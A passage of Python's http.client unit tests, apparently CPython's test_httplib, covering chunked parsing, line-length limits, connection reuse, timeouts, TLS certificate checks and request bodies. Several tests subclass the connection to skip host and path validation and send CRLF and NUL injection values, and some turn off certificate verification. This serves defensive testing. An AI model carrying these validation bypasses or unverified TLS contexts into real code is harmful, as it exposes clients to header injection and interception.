self.assertEqual(sock.sendall_calls, 2)
self.assertEqual(sock.data, expected)
def test_send_type_error(self):
# See: Issue #12676
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
with self.assertRaises(TypeError):
conn.request('POST', 'test', conn)
def test_chunked(self):
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(n) + resp.read(n) + resp.read(), expected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_readinto_chunked(self):
expected = chunked_expected
nexpected = len(expected)
b = bytearray(128)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
n = resp.readinto(b)
self.assertEqual(b[:nexpected], expected)
self.assertEqual(n, nexpected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
m = memoryview(b)
i = resp.readinto(m[0:n])
i += resp.readinto(m[i:n + i])
i += resp.readinto(m[i:])
self.assertEqual(b[:nexpected], expected)
self.assertEqual(i, nexpected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
n = resp.readinto(b)
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_readinto_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertEqual(bytes(b), b'\x00'*5)
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_negative_content_length(self):
sock = FakeSocket(
'HTTP/1.1 200 OK\r\nContent-Length: -1\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), b'Hello\r\n')
self.assertTrue(resp.isclosed())
def test_incomplete_read(self):
sock = FakeSocket('HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, b'Hello\r\n')
self.assertEqual(repr(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertEqual(str(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertTrue(resp.isclosed())
else:
self.fail('IncompleteRead expected')
def test_epipe(self):
sock = EPipeSocket(
"HTTP/1.0 401 Authorization Required\r\n"
"Content-type: text/html\r\n"
"WWW-Authenticate: Basic realm=\"example\"\r\n",
b"Content-Length")
conn = client.HTTPConnection("example.com")
conn.sock = sock
self.assertRaises(OSError,
lambda: conn.request("PUT", "/url", "body"))
resp = conn.getresponse()
self.assertEqual(401, resp.status)
self.assertEqual("Basic realm=\"example\"",
resp.getheader("www-authenticate"))
# Test lines overflowing the max line size (_MAXLINE in http.client)
def test_overflowing_status_line(self):
body = "HTTP/1.1 200 Ok" + "k" * 65536 + "\r\n"
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises((client.LineTooLong, client.BadStatusLine), resp.begin)
def test_overflowing_header_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'X-Foo: bar' + 'r' * 65536 + '\r\n\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises(client.LineTooLong, resp.begin)
def test_overflowing_header_limit_after_100(self):
body = (
'HTTP/1.1 100 OK\r\n'
'r\n' * 32768
)
resp = client.HTTPResponse(FakeSocket(body))
with self.assertRaises(client.HTTPException) as cm:
resp.begin()
# We must assert on the message as well, because other errors that we
# are not interested in can also be derived from HTTPException.
self.assertIn('got more than ', str(cm.exception))
self.assertIn('headers', str(cm.exception))
def test_overflowing_chunked_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
+ '0' * 65536 + 'a\r\n'
'hello world\r\n'
'0\r\n'
'\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
resp.begin()
self.assertRaises(client.LineTooLong, resp.read)
def test_early_eof(self):
# Test HTTPResponse with no \r\n termination.
body = "HTTP/1.1 200 Ok"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_error_leak(self):
# Test that the socket is not leaked if getresponse() fails
conn = client.HTTPConnection('example.com')
response = None
class Response(client.HTTPResponse):
def __init__(self, *pos, **kw):
nonlocal response
response = self # Avoid garbage collector closing the socket
client.HTTPResponse.__init__(self, *pos, **kw)
conn.response_class = Response
conn.sock = FakeSocket('Invalid status line')
conn.request('GET', '/')
self.assertRaises(client.BadStatusLine, conn.getresponse)
self.assertTrue(response.closed)
self.assertTrue(conn.sock.file_closed)
def test_chunked_extension(self):
extra = '3;foo=bar\r\n' + 'abc\r\n'
expected = chunked_expected + b'abc'
sock = FakeSocket(chunked_start + extra + last_chunk_extended + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_missing_end(self):
"""some servers may serve up a short chunked encoding stream"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk) #no terminating crlf
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_trailers(self):
"""See that trailers are read and ignored"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# we should have reached the end of the file
self.assertEqual(sock.file.read(), b"") #we read to the end
resp.close()
def test_chunked_sync(self):
"""Check that we don't read past the end of the chunked-encoding stream"""
expected = chunked_expected
extradata = "extradata"
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata.encode("ascii")) #we read to the end
resp.close()
def test_content_length_sync(self):
"""Check that we don't read past the end of the Content-Length stream"""
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readlines_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readlines(2000), [expected])
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(2000), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readline_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readline(10), expected)
self.assertEqual(resp.readline(10), b"")
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 30\r\n\r\n' + expected*3 + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(20), expected*2)
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_response_fileno(self):
# Make sure fd returned by fileno is valid.
serv = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
self.addCleanup(serv.close)
serv.bind((HOST, 0))
serv.listen()
result = None
def run_server():
[conn, address] = serv.accept()
with conn, conn.makefile("rb") as reader:
# Read the request header until a blank line
while True:
line = reader.readline()
if not line.rstrip(b"\r\n"):
break
conn.sendall(b"HTTP/1.1 200 Connection established\r\n\r\n")
nonlocal result
result = reader.read()
thread = threading.Thread(target=run_server)
thread.start()
self.addCleanup(thread.join, float(1))
conn = client.HTTPConnection(*serv.getsockname())
conn.request("CONNECT", "dummy:1234")
response = conn.getresponse()
try:
self.assertEqual(response.status, client.OK)
s = socket.socket(fileno=response.fileno())
try:
s.sendall(b"proxied data\n")
finally:
s.detach()
finally:
response.close()
conn.close()
thread.join()
self.assertEqual(result, b"proxied data\n")
def test_putrequest_override_domain_validation(self):
"""
It should be possible to override the default validation
behavior in putrequest (bpo-38216).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_path(self, url):
pass
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/\x00')
def test_putrequest_override_host_validation(self):
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_host(self, url):
pass
conn = UnsafeHTTPConnection('example.com\r\n')
conn.sock = FakeSocket('')
# set skip_host so a ValueError is not raised upon adding the
# invalid URL as the value of the "Host:" header
conn.putrequest('GET', '/', skip_host=1)
def test_putrequest_override_encoding(self):
"""
It should be possible to override the default encoding
to transmit bytes in another encoding even if invalid
(bpo-36274).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _encode_request(self, str_url):
return str_url.encode('utf-8')
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/☃')
class ExtendedReadTest(TestCase):
"""
Test peek(), read1(), readline()
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'\r\n'
'hello world!\n'
'and now \n'
'for something completely different\n'
'foo'
)
lines_expected = lines[lines.find('hello'):].encode("ascii")
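# The same payload in chunked form: each chunk is "<hex-size>\r\n<data>\r\n",
# terminated by a zero-length chunk and an empty trailer section.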
lines_chunked = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
def setUp(self):
sock = FakeSocket(self.lines)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
resp.fp = io.BufferedReader(resp.fp)
self.resp = resp
def test_peek(self):
resp = self.resp
# patch the buffered peek so that it does not return too much data at once
oldpeek = resp.fp.peek
def mypeek(n=-1):
p = oldpeek(n)
if n >= 0:
return p[:n]
return p[:10]
resp.fp.peek = mypeek
all = []
while True:
# try a short peek
p = resp.peek(3)
if p:
self.assertGreater(len(p), 0)
# then unbounded peek
p2 = resp.peek()
self.assertGreaterEqual(len(p2), len(p))
self.assertTrue(p2.startswith(p))
next = resp.read(len(p2))
self.assertEqual(next, p2)
else:
next = resp.read()
self.assertFalse(next)
all.append(next)
if not next:
break
self.assertEqual(b"".join(all), self.lines_expected)
def test_readline(self):
resp = self.resp
self._verify_readline(self.resp.readline, self.lines_expected)
def _verify_readline(self, readline, expected):
all = []
while True:
# short readlines
line = readline(5)
if line and line != b"foo":
if len(line) < 5:
self.assertTrue(line.endswith(b"\n"))
all.append(line)
if not line:
break
self.assertEqual(b"".join(all), expected)
def test_read1(self):
resp = self.resp
def r():
res = resp.read1(4)
self.assertLessEqual(len(res), 4)
return res
readliner = Readliner(r)
self._verify_readline(readliner.readline, self.lines_expected)
def test_read1_unbounded(self):
resp = self.resp
all = []
while True:
data = resp.read1()
if not data:
break
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_bounded(self):
resp = self.resp
all = []
while True:
data = resp.read1(10)
if not data:
break
self.assertLessEqual(len(data), 10)
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_0(self):
self.assertEqual(self.resp.read1(0), b"")
def test_peek_0(self):
p = self.resp.peek(0)
self.assertLessEqual(0, len(p))
class ExtendedReadTestChunked(ExtendedReadTest):
"""
Test peek(), read1(), readline() in chunked mode
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
class Readliner:
"""
a simple readline class that uses an arbitrary read function and buffering
"""
def __init__(self, readfunc):
self.readfunc = readfunc
self.remainder = b""
def readline(self, limit):
data = []
datalen = 0
read = self.remainder
try:
while True:
idx = read.find(b'\n')
if idx != -1:
break
if datalen + len(read) >= limit:
idx = limit - datalen - 1
break
# read more data
data.append(read)
read = self.readfunc()
if not read:
idx = 0 #eof condition
break
idx += 1
data.append(read[:idx])
self.remainder = read[idx:]
return b"".join(data)
except:
self.remainder = b"".join(data)
raise
class OfflineTest(TestCase):
def test_all(self):
# Documented objects defined in the module should be in __all__
expected = {"responses"} # Allowlist documented dict() object
# HTTPMessage, parse_headers(), and the HTTP status code constants are
# intentionally omitted for simplicity
blacklist = {"HTTPMessage", "parse_headers"}
for name in dir(client):
if name.startswith("_") or name in blacklist:
continue
module_object = getattr(client, name)
if getattr(module_object, "__module__", None) == "http.client":
expected.add(name)
self.assertCountEqual(client.__all__, expected)
def test_responses(self):
self.assertEqual(client.responses[client.NOT_FOUND], "Not Found")
def test_client_constants(self):
# Make sure we don't break backward compatibility with 3.4
expected = [
'CONTINUE',
'SWITCHING_PROTOCOLS',
'PROCESSING',
'OK',
'CREATED',
'ACCEPTED',
'NON_AUTHORITATIVE_INFORMATION',
'NO_CONTENT',
'RESET_CONTENT',
'PARTIAL_CONTENT',
'MULTI_STATUS',
'IM_USED',
'MULTIPLE_CHOICES',
'MOVED_PERMANENTLY',
'FOUND',
'SEE_OTHER',
'NOT_MODIFIED',
'USE_PROXY',
'TEMPORARY_REDIRECT',
'BAD_REQUEST',
'UNAUTHORIZED',
'PAYMENT_REQUIRED',
'FORBIDDEN',
'NOT_FOUND',
'METHOD_NOT_ALLOWED',
'NOT_ACCEPTABLE',
'PROXY_AUTHENTICATION_REQUIRED',
'REQUEST_TIMEOUT',
'CONFLICT',
'GONE',
'LENGTH_REQUIRED',
'PRECONDITION_FAILED',
'REQUEST_ENTITY_TOO_LARGE',
'REQUEST_URI_TOO_LONG',
'UNSUPPORTED_MEDIA_TYPE',
'REQUESTED_RANGE_NOT_SATISFIABLE',
'EXPECTATION_FAILED',
'MISDIRECTED_REQUEST',
'UNPROCESSABLE_ENTITY',
'LOCKED',
'FAILED_DEPENDENCY',
'UPGRADE_REQUIRED',
'PRECONDITION_REQUIRED',
'TOO_MANY_REQUESTS',
'REQUEST_HEADER_FIELDS_TOO_LARGE',
'INTERNAL_SERVER_ERROR',
'NOT_IMPLEMENTED',
'BAD_GATEWAY',
'SERVICE_UNAVAILABLE',
'GATEWAY_TIMEOUT',
'HTTP_VERSION_NOT_SUPPORTED',
'INSUFFICIENT_STORAGE',
'NOT_EXTENDED',
'NETWORK_AUTHENTICATION_REQUIRED',
]
for const in expected:
with self.subTest(constant=const):
self.assertTrue(hasattr(client, const))
class SourceAddressTest(TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.source_port = support.find_unused_port()
self.serv.listen()
self.conn = None
def tearDown(self):
if self.conn:
self.conn.close()
self.conn = None
self.serv.close()
self.serv = None
def testHTTPConnectionSourceAddress(self):
self.conn = client.HTTPConnection(HOST, self.port,
source_address=('', self.source_port))
self.conn.connect()
self.assertEqual(self.conn.sock.getsockname()[1], self.source_port)
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not defined')
def testHTTPSConnectionSourceAddress(self):
self.conn = client.HTTPSConnection(HOST, self.port,
source_address=('', self.source_port))
# We don't test anything here other than the constructor not barfing,
# since this test doesn't set up a running SSL server for an
# ssl-wrapped connect() to actually return from.
class TimeoutTest(TestCase):
PORT = None
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TimeoutTest.PORT = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
def testTimeoutAttribute(self):
# This will prove that the timeout gets through HTTPConnection
# and into the socket.
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
# no timeout -- do not use global socket default
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT,
timeout=None)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), None)
httpConn.close()
# a value
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT, timeout=30)
httpConn.connect()
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
class PersistenceTest(TestCase):
def test_reuse_reconnect(self):
# Should reuse or reconnect depending on header from server
tests = (
('1.0', '', False),
('1.0', 'Connection: keep-alive\r\n', True),
('1.1', '', True),
('1.1', 'Connection: close\r\n', False),
('1.0', 'Connection: keep-ALIVE\r\n', True),
('1.1', 'Connection: cloSE\r\n', False),
)
for version, header, reuse in tests:
with self.subTest(version=version, header=header):
msg = (
'HTTP/{} 200 OK\r\n'
'{}'
'Content-Length: 12\r\n'
'\r\n'
'Dummy body\r\n'
).format(version, header)
conn = FakeSocketHTTPConnection(msg)
self.assertIsNone(conn.sock)
conn.request('GET', '/open-connection')
with conn.getresponse() as response:
self.assertEqual(conn.sock is None, not reuse)
response.read()
self.assertEqual(conn.sock is None, not reuse)
self.assertEqual(conn.connections, 1)
conn.request('GET', '/subsequent-request')
self.assertEqual(conn.connections, 1 if reuse else 2)
def test_disconnected(self):
def make_reset_reader(text):
"""Return BufferedReader that raises ECONNRESET at EOF"""
stream = io.BytesIO(text)
def readinto(buffer):
size = io.BytesIO.readinto(stream, buffer)
if size == 0:
raise ConnectionResetError()
return size
stream.readinto = readinto
return io.BufferedReader(stream)
tests = (
(io.BytesIO, client.RemoteDisconnected),
(make_reset_reader, ConnectionResetError),
)
for stream_factory, exception in tests:
with self.subTest(exception=exception):
conn = FakeSocketHTTPConnection(b'', stream_factory)
conn.request('GET', '/eof-response')
self.assertRaises(exception, conn.getresponse)
self.assertIsNone(conn.sock)
# HTTPConnection.connect() should be automatically invoked
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
def test_100_close(self):
conn = FakeSocketHTTPConnection(
b'HTTP/1.1 100 Continue\r\n'
b'\r\n'
# Missing final response
)
conn.request('GET', '/', headers={'Expect': '100-continue'})
self.assertRaises(client.RemoteDisconnected, conn.getresponse)
self.assertIsNone(conn.sock)
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
class HTTPSTest(TestCase):
def setUp(self):
if not hasattr(client, 'HTTPSConnection'):
self.skipTest('ssl support required')
def make_server(self, certfile):
from test.ssl_servers import make_https_server
return make_https_server(self, certfile=certfile)
def test_attributes(self):
# simple test to check it's storing the timeout
h = client.HTTPSConnection(HOST, TimeoutTest.PORT, timeout=30)
self.assertEqual(h.timeout, 30)
def test_networked(self):
# Default settings: requires a valid cert from a trusted CA
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
h = client.HTTPSConnection('self-signed.pythontest.net', 443)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_networked_noverification(self):
# Switch off cert verification
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl._create_unverified_context()
h = client.HTTPSConnection('self-signed.pythontest.net', 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
h.close()
self.assertIn('nginx', resp.getheader('server'))
resp.close()
@support.system_must_validate_cert
def test_networked_trusted_by_default_cert(self):
# Default settings: requires a valid cert from a trusted CA
support.requires('network')
with support.transient_internet('www.python.org'):
h = client.HTTPSConnection('www.python.org', 443)
h.request('GET', '/')
resp = h.getresponse()
content_type = resp.getheader('content-type')
resp.close()
h.close()
self.assertIn('text/html', content_type)
def test_networked_good_cert(self):
# We feed the server's cert as a validating cert
import ssl
support.requires('network')
selfsigned_pythontestdotnet = 'self-signed.pythontest.net'
with support.transient_internet(selfsigned_pythontestdotnet):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(context.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(context.check_hostname, True)
context.load_verify_locations(CERT_selfsigned_pythontestdotnet)
try:
h = client.HTTPSConnection(selfsigned_pythontestdotnet, 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
except ssl.SSLError as ssl_err:
ssl_err_str = str(ssl_err)
# In the error message of [SSL: CERTIFICATE_VERIFY_FAILED] on
# modern Linux distros (Debian Buster, etc) default OpenSSL
# configurations it'll fail saying "key too weak" until we
# address https://bugs.python.org/issue36816 to use a proper
# key size on self-signed.pythontest.net.
if re.search(r'(?i)key.too.weak', ssl_err_str):
raise unittest.SkipTest(
f'Got {ssl_err_str} trying to connect '
f'to {selfsigned_pythontestdotnet}. '
'See https://bugs.python.org/issue36816.')
raise
server_string = resp.getheader('server')
resp.close()
h.close()
self.assertIn('nginx', server_string)
def test_networked_bad_cert(self):
# We feed a "CA" cert that is unrelated to the server's cert
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_unknown_cert(self):
# The custom cert isn't known to the default trust bundle
import ssl
server = self.make_server(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_good_hostname(self):
# The (valid) cert validates the HTTP hostname
import ssl
server = self.make_server(CERT_localhost)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port, context=context)
self.addCleanup(h.close)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.addCleanup(resp.close)
self.assertEqual(resp.status, 404)
def test_local_bad_hostname(self):
# The (valid) cert doesn't validate the HTTP hostname
import ssl
server = self.make_server(CERT_fakehostname)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_fakehostname)
h = client.HTTPSConnection('localhost', server.port, context=context)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# Same with explicit check_hostname=True
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# With check_hostname=False, the mismatching is ignored
context.check_hostname = False
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=False)
h.request('GET', '/nonexistent')
resp = h.getresponse()
resp.close()
h.close()
self.assertEqual(resp.status, 404)
# The context's check_hostname setting is used if one isn't passed to
# HTTPSConnection.
context.check_hostname = False
h = client.HTTPSConnection('localhost', server.port, context=context)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.assertEqual(resp.status, 404)
resp.close()
h.close()
# Passing check_hostname to HTTPSConnection should override the
# context's setting.
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not available')
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPSConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:443", "www.python.org", 443),
("www.python.org:", "www.python.org", 443),
("www.python.org", "www.python.org", 443),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 443),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b",
443)):
c = client.HTTPSConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_tls13_pha(self):
import ssl
if not ssl.HAS_TLSv1_3:
self.skipTest('TLS 1.3 support required')
# just check status of PHA flag
h = client.HTTPSConnection('localhost', 443)
self.assertTrue(h._context.post_handshake_auth)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertFalse(context.post_handshake_auth)
h = client.HTTPSConnection('localhost', 443, context=context)
self.assertIs(h._context, context)
self.assertFalse(h._context.post_handshake_auth)
h = client.HTTPSConnection('localhost', 443, context=context,
cert_file=CERT_localhost)
self.assertTrue(h._context.post_handshake_auth)
class RequestBodyTest(TestCase):
"""Test cases where a request includes a message body."""
def setUp(self):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket("")
def get_headers_and_fp(self):
f = io.BytesIO(self.sock.data)
f.readline() # read the request line
message = client.parse_headers(f)
return message, f
def test_list_body(self):
# Note that no content-length is automatically calculated for
# an iterable. The request will fall back to sending chunked
# transfer encoding.
cases = (
([b'foo', b'bar'], b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
((b'foo', b'bar'), b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
)
for body, expected in cases:
with self.subTest(body):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket('')
self.conn.request('PUT', '/url', body)
msg, f = self.get_headers_and_fp()
self.assertNotIn('Content-Type', msg)
self.assertNotIn('Content-Length', msg)
self.assertEqual(msg.get('Transfer-Encoding'), 'chunked')
self.assertEqual(expected, f.read())
def test_manual_content_length(self):
# Set an incorrect content-length so that we can verify that
# it will not be overridden by the library.
self.conn.request("PUT", "/url", "body",
{"Content-Length": "42"})
message, f = self.get_headers_and_fp()
self.assertEqual("42", message.get("content-length"))
self.assertEqual(4, len(f.read()))
def test_ascii_body(self):
self.conn.request("PUT", "/url", "body")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("4", message.get("content-length"))
self.assertEqual(b'body', f.read())
def test_latin1_body(self):
self.conn.request("PUT", "/url", "body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_bytes_body(self):
self.conn.request("PUT", "/url", b"body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_text_file_body(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "w") as f:
f.write("body")
with open(support.TESTFN) as f:
